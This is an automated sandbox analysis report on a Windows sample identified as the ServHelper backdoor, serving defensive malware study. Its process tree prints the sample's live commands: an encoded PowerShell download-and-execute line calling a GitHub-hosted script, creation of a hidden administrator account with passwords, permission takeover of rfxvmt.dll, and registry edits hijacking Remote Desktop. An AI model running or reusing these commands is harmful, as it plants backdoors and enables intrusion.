Analysis
-
max time kernel
136s -
max time network
124s -
platform
windows7_x64 -
resource
win7-20240319-en -
resource tags
arch:x64arch:x86image:win7-20240319-enlocale:en-usos:windows7-x64system -
submitted
10-04-2024 11:32
Static task
static1
Behavioral task
behavioral1
Sample
64cb280711db0137dc6da7f2cd71745f94ada56d890c6326f07f1b36eee36e07.exe
Resource
win7-20240319-en
Behavioral task
behavioral2
Sample
64cb280711db0137dc6da7f2cd71745f94ada56d890c6326f07f1b36eee36e07.exe
Resource
win10v2004-20240226-en
General
-
Target
64cb280711db0137dc6da7f2cd71745f94ada56d890c6326f07f1b36eee36e07.exe
-
Size
6.7MB
-
MD5
185a05aefc21ed3f07716a01871e2c5a
-
SHA1
2e706b6810c21605fbb4b6c32dbdb1e5c1c28f0a
-
SHA256
64cb280711db0137dc6da7f2cd71745f94ada56d890c6326f07f1b36eee36e07
-
SHA512
458307a3b8f9ecd0bcae80582051835f5b263690d28bc85d4b228b1de7a3cb8146af9e7c139201146a1585a0d11531ef8a4534d00e1517406d8b19ecd835a7d9
-
SSDEEP
98304:Wrbq9XeGw2WuPDwTTOzAElMLmZ7oo8kTApKGaRqc4O1XujlqHRARZ:WrbcZpPDsTTLmxoQT7RRq4ujlzRZ
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid Process 5 2444 powershell.exe 6 2444 powershell.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Possible privilege escalation attempt 8 IoCs
Processes:
icacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exepid Process 2380 icacls.exe 2256 icacls.exe 2832 takeown.exe 1876 icacls.exe 1224 icacls.exe 1972 icacls.exe 1684 icacls.exe 2316 icacls.exe -
Sets DLL path for service in the registry 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png" reg.exe -
Loads dropped DLL 2 IoCs
Processes:
pid Process 1084 1084 -
Modifies file permissions 1 TTPs 8 IoCs
Processes:
icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exepid Process 1224 icacls.exe 1972 icacls.exe 1684 icacls.exe 2316 icacls.exe 2380 icacls.exe 2256 icacls.exe 2832 takeown.exe 1876 icacls.exe -
Processes:
resource yara_rule behavioral1/files/0x000b000000015574-106.dat upx behavioral1/files/0x000a00000001558c-107.dat upx -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
Processes:
flow ioc 4 raw.githubusercontent.com 5 raw.githubusercontent.com 6 raw.githubusercontent.com -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc Process File created C:\Windows\system32\rfxvmt.dll powershell.exe -
Drops file in Windows directory 9 IoCs
Processes:
powershell.exepowershell.exedescription ioc Process File created C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3WW0W1E5KMLRR7WODYOA.temp powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
-
Modifies data under HKEY_USERS 4 IoCs
Processes:
powershell.exeWMIC.exeWMIC.exedescription ioc Process Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = f02d7ad93a8bda01 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid Process 2640 powershell.exe 2448 powershell.exe 2844 powershell.exe 1008 powershell.exe 2640 powershell.exe 2640 powershell.exe 2640 powershell.exe 2444 powershell.exe -
Suspicious behavior: LoadsDriver 5 IoCs
Processes:
pid Process 468 1084 1084 1084 1084 -
Suspicious use of AdjustPrivilegeToken 18 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exeicacls.exeWMIC.exeWMIC.exepowershell.exedescription pid Process Token: SeDebugPrivilege 2640 powershell.exe Token: SeDebugPrivilege 2448 powershell.exe Token: SeDebugPrivilege 2844 powershell.exe Token: SeDebugPrivilege 1008 powershell.exe Token: SeRestorePrivilege 1224 icacls.exe Token: SeAssignPrimaryTokenPrivilege 2560 WMIC.exe Token: SeIncreaseQuotaPrivilege 2560 WMIC.exe Token: SeAuditPrivilege 2560 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 2560 WMIC.exe Token: SeIncreaseQuotaPrivilege 2560 WMIC.exe Token: SeAuditPrivilege 2560 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 2964 WMIC.exe Token: SeIncreaseQuotaPrivilege 2964 WMIC.exe Token: SeAuditPrivilege 2964 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 2964 WMIC.exe Token: SeIncreaseQuotaPrivilege 2964 WMIC.exe Token: SeAuditPrivilege 2964 WMIC.exe Token: SeDebugPrivilege 2444 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
64cb280711db0137dc6da7f2cd71745f94ada56d890c6326f07f1b36eee36e07.exepowershell.execsc.exenet.execmd.execmd.exedescription pid Process procid_target PID 2056 wrote to memory of 2640 2056 64cb280711db0137dc6da7f2cd71745f94ada56d890c6326f07f1b36eee36e07.exe 29 PID 2056 wrote to memory of 2640 2056 64cb280711db0137dc6da7f2cd71745f94ada56d890c6326f07f1b36eee36e07.exe 29 PID 2056 wrote to memory of 2640 2056 64cb280711db0137dc6da7f2cd71745f94ada56d890c6326f07f1b36eee36e07.exe 29 PID 2640 wrote to memory of 2080 2640 powershell.exe 31 PID 2640 wrote to memory of 2080 2640 powershell.exe 31 PID 2640 wrote to memory of 2080 2640 powershell.exe 31 PID 2080 wrote to memory of 2812 2080 csc.exe 32 PID 2080 wrote to memory of 2812 2080 csc.exe 32 PID 2080 wrote to memory of 2812 2080 csc.exe 32 PID 2640 wrote to memory of 2448 2640 powershell.exe 33 PID 2640 wrote to memory of 2448 2640 powershell.exe 33 PID 2640 wrote to memory of 2448 2640 powershell.exe 33 PID 2640 wrote to memory of 2844 2640 powershell.exe 35 PID 2640 wrote to memory of 2844 2640 powershell.exe 35 PID 2640 wrote to memory of 2844 2640 powershell.exe 35 PID 2640 wrote to memory of 1008 2640 powershell.exe 37 PID 2640 wrote to memory of 1008 2640 powershell.exe 37 PID 2640 wrote to memory of 1008 2640 powershell.exe 37 PID 2640 wrote to memory of 2832 2640 powershell.exe 39 PID 2640 wrote to memory of 2832 2640 powershell.exe 39 PID 2640 wrote to memory of 2832 2640 powershell.exe 39 PID 2640 wrote to memory of 1876 2640 powershell.exe 40 PID 2640 wrote to memory of 1876 2640 powershell.exe 40 PID 2640 wrote to memory of 1876 2640 powershell.exe 40 PID 2640 wrote to memory of 1224 2640 powershell.exe 41 PID 2640 wrote to memory of 1224 2640 powershell.exe 41 PID 2640 wrote to memory of 1224 2640 powershell.exe 41 PID 2640 wrote to memory of 1972 2640 powershell.exe 42 PID 2640 wrote to memory of 1972 2640 powershell.exe 42 PID 2640 wrote to memory of 1972 2640 powershell.exe 42 PID 2640 wrote to memory of 1684 2640 powershell.exe 43 PID 2640 wrote to memory of 1684 2640 powershell.exe 43 PID 2640 wrote to memory of 1684 2640 powershell.exe 43 PID 2640 wrote to memory of 2316 2640 powershell.exe 44 PID 2640 wrote to memory of 2316 2640 powershell.exe 44 PID 2640 wrote to memory of 2316 2640 powershell.exe 44 PID 2640 wrote to memory of 2380 2640 powershell.exe 45 PID 2640 wrote to memory of 2380 2640 powershell.exe 45 PID 2640 wrote to memory of 2380 2640 powershell.exe 45 PID 2640 wrote to memory of 2256 2640 powershell.exe 47 PID 2640 wrote to memory of 2256 2640 powershell.exe 47 PID 2640 wrote to memory of 2256 2640 powershell.exe 47 PID 2640 wrote to memory of 820 2640 powershell.exe 48 PID 2640 wrote to memory of 820 2640 powershell.exe 48 PID 2640 wrote to memory of 820 2640 powershell.exe 48 PID 2640 wrote to memory of 1908 2640 powershell.exe 49 PID 2640 wrote to memory of 1908 2640 powershell.exe 49 PID 2640 wrote to memory of 1908 2640 powershell.exe 49 PID 2640 wrote to memory of 1044 2640 powershell.exe 50 PID 2640 wrote to memory of 1044 2640 powershell.exe 50 PID 2640 wrote to memory of 1044 2640 powershell.exe 50 PID 2640 wrote to memory of 2116 2640 powershell.exe 52 PID 2640 wrote to memory of 2116 2640 powershell.exe 52 PID 2640 wrote to memory of 2116 2640 powershell.exe 52 PID 2116 wrote to memory of 1148 2116 net.exe 53 PID 2116 wrote to memory of 1148 2116 net.exe 53 PID 2116 wrote to memory of 1148 2116 net.exe 53 PID 2640 wrote to memory of 1244 2640 powershell.exe 54 PID 2640 wrote to memory of 1244 2640 powershell.exe 54 PID 2640 wrote to memory of 1244 2640 powershell.exe 54 PID 1244 wrote to memory of 1616 1244 cmd.exe 55 PID 1244 wrote to memory of 1616 1244 cmd.exe 55 PID 1244 wrote to memory of 1616 1244 cmd.exe 55 PID 1616 wrote to memory of 296 1616 cmd.exe 56
Processes
-
C:\Users\Admin\AppData\Local\Temp\64cb280711db0137dc6da7f2cd71745f94ada56d890c6326f07f1b36eee36e07.exe"C:\Users\Admin\AppData\Local\Temp\64cb280711db0137dc6da7f2cd71745f94ada56d890c6326f07f1b36eee36e07.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2056 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2640 -
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\dyppuntv.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:2080 -
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES54A6.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC5496.tmp"4⤵PID:2812
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2448
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2844
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1008
-
-
C:\Windows\system32\takeown.exe"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2832
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1876
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1224
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1972
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1684
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2316
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2380
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2256
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵PID:820
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Sets DLL path for service in the registry
- Modifies registry key
PID:1908
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵PID:1044
-
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
PID:2116 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵PID:1148
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
PID:1244 -
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
PID:1616 -
C:\Windows\system32\net.exenet start rdpdr5⤵PID:296
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵PID:3016
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵PID:1768
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵PID:1728
-
C:\Windows\system32\net.exenet start TermService5⤵PID:332
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵PID:2728
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵PID:1812
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵PID:1264
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc Ghasar4f5 /del1⤵PID:2312
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc Ghasar4f5 /del2⤵PID:2108
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc Ghasar4f5 /del3⤵PID:1076
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc Mmga0cR8 /add1⤵PID:2916
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc Mmga0cR8 /add2⤵PID:2168
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc Mmga0cR8 /add3⤵PID:972
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵PID:2020
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵PID:2024
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵PID:876
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" UEITMFAB$ /ADD1⤵PID:1892
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" UEITMFAB$ /ADD2⤵PID:800
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" UEITMFAB$ /ADD3⤵PID:1088
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵PID:1604
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵PID:2128
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵PID:2360
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc Mmga0cR81⤵PID:792
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc Mmga0cR82⤵PID:2628
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc Mmga0cR83⤵PID:1940
-
-
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵PID:964
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Detects videocard installed
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2560
-
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵PID:2812
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2964
-
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵PID:2588
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵PID:2428
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2444
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5cf2cab7dcffaccaf17671dd98cbdbaa1
SHA12f09c2331fb0b73dcf997a8b4063f3f88e3cb4dc
SHA256bcfb981a4450142b97bd46570be04a239dda7478221c2cf31558c9a4e9f610b8
SHA51221ad440c64f37ddb28cc8e91ca0a44306ecfbef2f5b3d0de8e266b3ad94a429f9e250e2c7b3bdbdb8626c7762195ba5f9b13024135641eafe009fd86a6a2fe6a
-
Filesize
3KB
MD525cabd66b8b0681cbd7ff2082c3d3a87
SHA15b046193083896c952a4c1e82c7dc92acd01b307
SHA256d69bceb548f52aafe641a0149074d32b79198709fba4cee319cdd9b9c29063cc
SHA512757a85e3234e4686b89173f31a789a9c5a9e0ac5485b1816ca95768f48d5c92e41d7a639bd4bd08c889dbc31ff15770eaebb2d227f7db59e065ce3c6fa5f8eda
-
Filesize
7KB
MD58fffd48d30ada20502447247e4c44739
SHA108e7697f5d890e135477d6ed0ccf59c9999af46e
SHA256833a1888de6f49c945e2019d46255280c3d7bac9bd25d144d8931e55b637b9eb
SHA5125e9bf660e55943a79eab76d06519c1b5cd9a8bade9e2467b091b47405301611e226f13f1f1da83573002b56da8b3228985ab63c9ed4878e010b1273e627a92d9
-
Filesize
2.5MB
MD55db5ffa607b5b5ca17bfd6fb78403660
SHA11e793958cb1dd1dc99da4a50beaa2945561b7a16
SHA2561fa24f444e6b18ab2072201a5d9de4df325830990f073194addb5327137c2e89
SHA5123d2eab2b02c1d7302b563e3cc232791e242c8d2686a0a4cb58115cdd4ca19f48e390791404f62fef2c0fdbe3e5185b260de6a8fd5ccef2e091d473e0186ffe43
-
Filesize
1KB
MD528d9755addec05c0b24cca50dfe3a92b
SHA17d3156f11c7a7fb60d29809caf93101de2681aa3
SHA256abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
SHA512891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5f88cb7446feef2c2d9222b0a4a9ccec8
SHA189f3e88e93e9511cbf2e396474b6a671a1c0958e
SHA256f3862510dcce3fe0be99faee32320ad9d1d25c52b320e6952ee5779a022752eb
SHA51233f362533c2b3b4433a19532cf2825ac162e0a84bebcfb3667a01201d4bd57fdb46e01953d17f110ebb48fc5f146c7da47f51a84a91e8d5cce40d0b42e9c79a4
-
Filesize
40KB
MD5dc39d23e4c0e681fad7a3e1342a2843c
SHA158fd7d50c2dca464a128f5e0435d6f0515e62073
SHA2566d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
SHA5125cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
Filesize
652B
MD58c337440a7948c1894cc084e20b1e196
SHA1cae2ad7970cf8f593edaad4fef70129051ad66c7
SHA256099a37122cd4069039a7c04acc29e44a488f27474ebbd23e6f7fa1a184ca9f63
SHA51256953c912558f9478e6bc3ee006270d2db4f0bcac9816ae2c7ba4e6d3470293f245d991d949f778a32971bd6d73094fe3a5a1fe920cd754245b5a3ffd0d0c189
-
Filesize
424B
MD59f8ab7eb0ab21443a2fe06dab341510e
SHA12b88b3116a79e48bab7114e18c9b9674e8a52165
SHA256e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
SHA51253f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b
-
Filesize
309B
MD505035be1b25bc928a6422a86e8b92250
SHA1650a1b4928e7d3202dfcf787a8537aadae46632e
SHA256227132e1a5d005a1c99073810dd0c74577f2fb9c316ba8ed651874608e1919f2
SHA5123d1814dec1847e22797209a1d974d7cf690e07a5dc36b30035c1d1cde495a6a275bbc2bd9f593a410fd637a4c247f7f40f69ccc79ff45955488137d0fc253ddd
-
Filesize
60KB
MD596e498a3833f52ae46bcfdc391f73cf7
SHA1ecaf72b46cf1cb074bde2914963bb1e61450ca95
SHA25621a0a297e9a2295f7e32aea08ea74c01199cc57d30b8a177fa99c9cc96a6268b
SHA5129f273a77d434807138c884cc95deb1cadea1ff6db492839d238759a265f3b0ded318b6af59d0743f8dd1555e968afb1eca9ba92a214ecd247480d2a072c08540
-
Filesize
743KB
MD52ee3d03bb1f8bd257235fc70e92b17e1
SHA1c36482b8f8229578dec1cc687aaf53084cb6d05e
SHA256b7a9b4269995093c63efe64cb65e4562680af2fdf7c4dfdc235f2eb60c469ff0
SHA51239f8a42a512e4bfbf84ac3c472bf9444a139da23b7007f57aa68dc9ba9db5466b7f155df18c0a49e3073527763ef459180ab1912e53453d312c17718ab67abea